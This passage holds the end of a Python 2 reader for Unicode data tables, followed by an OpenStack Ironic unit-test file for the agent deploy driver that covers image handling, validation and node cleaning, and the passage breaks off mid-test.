match = re.match("<(.*), (First|Last)>", s)
if match is not None:
return match.groups()
return (s, None)
def ReadUnicodeTable(filename, nfields, doline):
"""Generic Unicode table text file reader.
The reader takes care of stripping out comments and also
parsing the two different ways that the Unicode tables specify
code ranges (using the .. notation and splitting the range across
multiple lines).
Each non-comment line in the table is expected to have the given
number of fields. The first field is known to be the Unicode value
and the second field its description.
The reader calls doline(codes, fields) for each entry in the table.
If fn raises an exception, the reader prints that exception,
prefixed with the file name and line number, and continues
processing the file. When done with the file, the reader re-raises
the first exception encountered during the file.
Arguments:
filename: the Unicode data file to read, or a file-like object.
nfields: the number of expected fields per line in that file.
doline: the function to call for each table entry.
Raises:
InputError: nfields is invalid (must be >= 2).
"""
if nfields < 2:
raise InputError("invalid number of fields %d" % (nfields,))
if type(filename) == str:
if filename.startswith("http://"):
fil = urllib2.urlopen(filename)
else:
fil = open(filename, "r")
else:
fil = filename
first = None # first code in multiline range
expect_last = None # tag expected for "Last" line in multiline range
lineno = 0 # current line number
for line in fil:
lineno += 1
try:
# Chop # comments and white space; ignore empty lines.
sharp = line.find("#")
if sharp >= 0:
line = line[:sharp]
line = line.strip()
if not line:
continue
# Split fields on ";", chop more white space.
# Must have the expected number of fields.
fields = [s.strip() for s in line.split(";")]
if len(fields) != nfields:
raise InputError("wrong number of fields %d %d - %s" %
(len(fields), nfields, line))
# The Unicode text files have two different ways
# to list a Unicode range. Either the first field is
# itself a range (0000..FFFF), or the range is split
# across two lines, with the second field noting
# the continuation.
codes = _URange(fields[0])
(name, cont) = _ParseContinue(fields[1])
if expect_last is not None:
# If the last line gave the First code in a range,
# this one had better give the Last one.
if (len(codes) != 1 or codes[0] <= first or
cont != "Last" or name != expect_last):
raise InputError("expected Last line for %s" %
(expect_last,))
codes = range(first, codes[0] + 1)
first = None
expect_last = None
fields[0] = "%04X..%04X" % (codes[0], codes[-1])
fields[1] = name
elif cont == "First":
# Otherwise, if this is the First code in a range,
# remember it and go to the next line.
if len(codes) != 1:
raise InputError("bad First line: range given")
expect_last = name
first = codes[0]
continue
doline(codes, fields)
except Exception, e:
print "%s:%d: %s" % (filename, lineno, e)
raise
if expect_last is not None:
raise InputError("expected Last line for %s; got EOF" %
(expect_last,))
def CaseGroups(unicode_dir=_UNICODE_DIR):
"""Returns list of Unicode code groups equivalent under case folding.
Each group is a sorted list of code points,
and the list of groups is sorted by first code point
in the group.
Args:
unicode_dir: Unicode data directory
Returns:
list of Unicode code groups
"""
# Dict mapping lowercase code point to fold-equivalent group.
togroup = {}
def DoLine(codes, fields):
"""Process single CaseFolding.txt line, updating togroup."""
(_, foldtype, lower, _) = fields
if foldtype not in ("C", "S"):
return
lower = _UInt(lower)
togroup.setdefault(lower, [lower]).extend(codes)
ReadUnicodeTable(unicode_dir+"/CaseFolding.txt", 4, DoLine)
groups = togroup.values()
for g in groups:
g.sort()
groups.sort()
return togroup, groups
def Scripts(unicode_dir=_UNICODE_DIR):
"""Returns dict mapping script names to code lists.
Args:
unicode_dir: Unicode data directory
Returns:
dict mapping script names to code lists
"""
scripts = {}
def DoLine(codes, fields):
"""Process single Scripts.txt line, updating scripts."""
(_, name) = fields
scripts.setdefault(name, []).extend(codes)
ReadUnicodeTable(unicode_dir+"/Scripts.txt", 2, DoLine)
return scripts
def Categories(unicode_dir=_UNICODE_DIR):
"""Returns dict mapping category names to code lists.
Args:
unicode_dir: Unicode data directory
Returns:
dict mapping category names to code lists
"""
categories = {}
def DoLine(codes, fields):
"""Process single UnicodeData.txt line, updating categories."""
category = fields[2]
categories.setdefault(category, []).extend(codes)
# Add codes from Lu into L, etc.
if len(category) > 1:
short = category[0]
categories.setdefault(short, []).extend(codes)
ReadUnicodeTable(unicode_dir+"/UnicodeData.txt", 15, DoLine)
return categories
| |
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
from oslo_config import cfg
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import raid
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import fake
from ironic.drivers.modules import pxe
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
INSTANCE_INFO = db_utils.get_test_agent_instance_info()
DRIVER_INFO = db_utils.get_test_agent_driver_info()
DRIVER_INTERNAL_INFO = db_utils.get_test_agent_driver_internal_info()
CONF = cfg.CONF
class TestAgentMethods(db_base.DbTestCase):
def setUp(self):
super(TestAgentMethods, self).setUp()
self.node = object_utils.create_test_node(self.context,
driver='fake_agent')
dhcp_factory.DHCPFactory._dhcp_provider = None
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_image(self, glance_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = True
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare'}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_partition_image(
self, glance_mock, parse_instance_info_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
i_info['kernel'] = '13ce5a56-1de3-4916-b8b2-be778645d003'
i_info['ramdisk'] = 'a5a370a8-1b39-433f-be63-2c7d708e4b4e'
i_info['root_gb'] = 5
i_info['swap_mb'] = 4
i_info['ephemeral_gb'] = 0
i_info['ephemeral_format'] = None
i_info['configdrive'] = 'configdrive'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare',
'properties': {'kernel_id': 'kernel',
'ramdisk_id': 'ramdisk'}}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
glance_obj_mock = glance_mock.return_value
glance_obj_mock.swift_temp_url.return_value = 'temp-url'
parse_instance_info_mock.return_value = {'swap_mb': 4}
image_source = '733d1c44-a2ea-414b-aca7-69decf20d810'
expected_i_info = {'root_gb': 5,
'swap_mb': 4,
'ephemeral_gb': 0,
'ephemeral_format': None,
'configdrive': 'configdrive',
'image_source': image_source,
'image_url': 'temp-url',
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'image_type': 'partition',
'image_checksum': 'aa',
'fake_password': 'fakepass',
'image_container_format': 'bare',
'image_disk_format': 'qcow2',
'foo': 'bar'}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
image_type = task.node.instance_info.get('image_type')
self.assertEqual('partition', image_type)
self.assertEqual('kernel', info.get('kernel'))
self.assertEqual('ramdisk', info.get('ramdisk'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_image(
self, validate_href_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
i_info['image_checksum'] = 'aa'
driver_internal_info['is_whole_disk_image'] = True
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_partition_image(
self, validate_href_mock, parse_instance_info_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['kernel'] = 'http://kernel-ref'
i_info['ramdisk'] = 'http://ramdisk-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
driver_internal_info['is_whole_disk_image'] = False
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
validate_href_mock.side_effect = ['http://image-ref',
'http://kernel-ref',
'http://ramdisk-ref']
parse_instance_info_mock.return_value = {'swap_mb': 5}
expected_i_info = {'image_source': 'http://image-ref',
'image_url': 'http://image-ref',
'image_type': 'partition',
'kernel': 'http://kernel-ref',
'ramdisk': 'http://ramdisk-ref',
'image_checksum': 'aa',
'root_gb': 10,
'swap_mb': 5,
'fake_password': 'fakepass',
'foo': 'bar'}
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
self.assertEqual('partition', info.get('image_type'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonsupported_image(
self, validate_href_mock):
validate_href_mock.side_effect = iter(
[exception.ImageRefValidationFailed(
image_href='file://img.qcow2', reason='fail')])
i_info = self.node.instance_info
i_info['image_source'] = 'file://img.qcow2'
i_info['image_checksum'] = 'aa'
self.node.instance_info = i_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.ImageRefValidationFailed,
agent.build_instance_info_for_deploy, task)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size(self, show_mock):
show_mock.return_value = {
'size': 10 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_without_memory_mb(self, show_mock):
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties.pop('memory_mb', None)
agent.check_image_size(task, 'fake-image')
self.assertFalse(show_mock.called)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail(self, show_mock):
show_mock.return_value = {
'size': 11 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail_by_agent_consumed_memory(self, show_mock):
self.config(memory_consumed_by_agent=2, group='agent')
show_mock.return_value = {
'size': 9 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_enabled(self, show_mock):
CONF.set_override('stream_raw_images', True, 'agent')
# Image is bigger than memory but it's raw and will be streamed
# so the test should pass
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_disabled(self, show_mock):
CONF.set_override('stream_raw_images', False, 'agent')
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
# Image is raw but stream is disabled, so test should fail since
# the image is bigger than the RAM size
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
class TestAgentDeploy(db_base.DbTestCase):
def setUp(self):
super(TestAgentDeploy, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
self.driver = agent.AgentDeploy()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
self.ports = [
object_utils.create_test_port(self.context, node_id=self.node.id)]
dhcp_factory.DHCPFactory._dhcp_provider = None
def test_get_properties(self):
expected = agent.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.get_properties())
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate(self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_driver_info_manage_agent_boot_false(
self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
self.config(manage_agent_boot=False, group='agent')
self.node.driver_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
self.assertFalse(pxe_boot_validate_mock.called)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_instance_info_missing_params(
self, pxe_boot_validate_mock):
self.node.instance_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
e = self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
self.assertIn('instance_info.image_source', str(e))
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_nonglance_image_no_checksum(
self, pxe_boot_validate_mock):
i_info = self.node.instance_info
i_info['image_source'] = 'http://image-ref'
del i_info['image_checksum']
self.node.instance_info = i_info
self.node.save()
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_root_device_hints(
self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_proxies(self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_info.update({
'image_https_proxy': 'git://spam.ni',
'image_http_proxy': 'http://spam.ni',
'image_no_proxy': '1' * 500})
self.assertRaisesRegexp(exception.InvalidParameterValue,
'image_https_proxy.*image_no_proxy',
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_deploy(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.deploy(task)
self.assertEqual(driver_return, states.DEPLOYWAIT)
power_mock.assert_called_once_with(task, states.REBOOT)
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_tear_down(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.tear_down(task)
power_mock.assert_called_once_with(task, states.POWER_OFF)
self.assertEqual(driver_return, states.DELETED)
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare(self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
build_options_mock.return_value = {'a': 'b'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
build_options_mock.assert_called_once_with(task.node)
pxe_prepare_ramdisk_mock.assert_called_once_with(
task, {'a': 'b'})
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_manage_agent_boot_false(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_active(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.ACTIVE
self.driver.prepare(task)
self.assertFalse(build_instance_info_mock.called)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up(self, pxe_clean_up_ramdisk_mock, clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.clean_up(task)
pxe_clean_up_ramdisk_mock.assert_called_once_with(task)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up_manage_agent_boot_false(self, pxe_clean_up_ramdisk_mock,
clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.config(group='agent', manage_agent_boot=False)
self.driver.clean_up(task)
self.assertFalse(pxe_clean_up_ramdisk_mock.called)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps(self, mock_get_clean_steps):
# Test getting clean steps
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
steps = self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': None})
self.assertEqual(mock_steps, steps)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps_config_priority(self, mock_get_clean_steps):
# Test that we can override the priority of get clean steps
# Use 0 because it is an edge case (false-y) and used in devstack
self.config(erase_devices_priority=0, group='deploy')
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': 0})
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning(self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning_manage_agent_boot_false(
self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning(self, tear_down_cleaning_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning_manage_agent_boot_false(
self, tear_down_cleaning_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
class TestAgentVendor(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendor, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
def _test_continue_deploy(self, additional_driver_info=None,
additional_expected_image_info=None):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info.update(additional_driver_info or {})
self.node.driver_info = driver_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': CONF.agent.stream_raw_images,
}
expected_image_info.update(additional_expected_image_info or {})
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
def test_continue_deploy(self):
self._test_continue_deploy()
def test_continue_deploy_with_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_https_proxy': 'https://spam.ni',
'image_http_proxy': 'spam.ni',
'image_no_proxy': '.eggs.com'},
additional_expected_image_info={
'proxies': {'https': 'https://spam.ni',
'http': 'spam.ni'},
'no_proxy': '.eggs.com'}
)
def test_continue_deploy_with_no_proxy_without_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_no_proxy': '.eggs.com'}
)
def test_continue_deploy_image_source_is_url(self):
instance_info = self.node.instance_info
instance_info['image_source'] = 'http://example.com/woof.img'
self.node.instance_info = instance_info
self._test_continue_deploy(
additional_expected_image_info={
'id': 'woof.img'
}
)
def test_continue_deploy_partition_image(self):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
i_info = self.node.instance_info
i_info['kernel'] = 'kernel'
i_info['ramdisk'] = 'ramdisk'
i_info['root_gb'] = 10
i_info['swap_mb'] = 10
i_info['ephemeral_mb'] = 0
i_info['ephemeral_format'] = 'abc'
i_info['configdrive'] = 'configdrive'
i_info['preserve_ephemeral'] = False
i_info['image_type'] = 'partition'
i_info['root_mb'] = 10240
i_info['deploy_boot_mode'] = 'bios'
i_info['capabilities'] = {"boot_option": "local",
"disk_label": "msdos"}
self.node.instance_info = i_info
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'node_uuid': self.node.uuid,
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': True,
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'root_gb': 10,
'swap_mb': 10,
'ephemeral_mb': 0,
'ephemeral_format': 'abc',
'configdrive': 'configdrive',
'preserve_ephemeral': False,
'image_type': 'partition',
'root_mb': 10240,
'boot_option': 'local',
'deploy_boot_mode': 'bios',
'disk_label': 'msdos'
}
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock, node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
self.passthru.reboot_to_instance(task)
clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertFalse(prepare_mock.called)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
self.assertFalse(uuid_mock.called)
@mock.patch.object(deploy_utils, 'get_boot_mode_for_deploy', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
